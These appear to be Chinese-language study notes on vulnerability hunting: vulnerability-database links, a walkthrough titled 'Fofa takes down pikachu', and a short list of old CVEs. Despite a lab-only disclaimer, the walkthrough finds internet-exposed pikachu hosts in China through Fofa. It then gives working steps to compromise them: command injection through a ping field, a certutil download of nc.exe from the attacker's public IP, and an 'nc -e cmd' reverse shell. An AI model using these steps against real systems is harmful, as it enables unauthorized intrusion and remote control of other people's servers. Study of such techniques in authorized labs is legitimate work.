漏洞挖掘

一、学习资料

1 安全资料网站

漏洞库查找

漏洞库网站

official::CVE

official::RFC

official::知道创宇

official::网安

official::国家漏洞平台

2 学习资料网站

Edge.Forum* (ywhack.com)

反弹shell生成器 (ywhack.com)

web安全入门篇-渗透测试中常用的命令-CSDN博客


二、简单案例

1 Fofa拿下pikachu

注:仅限靶场,切勿攻击他人真实服务器

命令文件下载:解决无图形化下载文件、数据传输问题:

  • Linux:wget、curl、python等

  • Windows:Powershell、Certutil等

  • 文件下载命令构造

  • 例:windows下载原神:CMD——powershell.exe -Command "Invoke-WebRequest -Uri https://ys-api.mihoyo.com/event/download_porter/link/ys_cn/official/pc_default -OutFile genshin.exe"

反弹shell:解决数据回显、数据通讯的问题:

  • 正向连接:主动找别人。

  • 反向连接:别人找自己。

  • Shell命令构造

  • 防火墙绕过:防火墙策略入栈严格出栈宽松,所以要让用户主动找你,可以绕过防火墙。

  • 监听端口:nc -l [port]
  • 将自身cmd送给监听端:nc -e cmd [ip] [port]

实战pikachu:

  1. 在Fofa中搜索"pikachu" && country="CN" && title == "Get the pikachu"
  2. 找到REC——ping,输入127.0.0.1测试,失败就换一个。
  3. 成功后执行127.0.0.1 && ipconfig127.0.0.1 && ifconfig获得系统 。
  4. 构造文件下载命令(自身服务器要开启且有nc.exe给用户下载,要公网IP),例如:certutil.exe -urlcache -split -f http://MyIp:80/nc.exe n.exe
  5. 自身服务器用命令nc -l 80开启监听
  6. 执行命令n.exe -e cmd MyIp 80,拿下服务器

三、过去漏洞

1 vsftpd2.3.4笑脸漏洞(CVE-2011-2523)

漏洞 exp 加固

原理:21端口,输入的字段中有 :) (0x3a,0x29)将会自动打开 6200 端口。

2 永恒之蓝(CVE-2017-0146)

永恒之蓝复现链接

3 震网三代(CVE-2017-8464)

CVE-2017-8464(震网三代)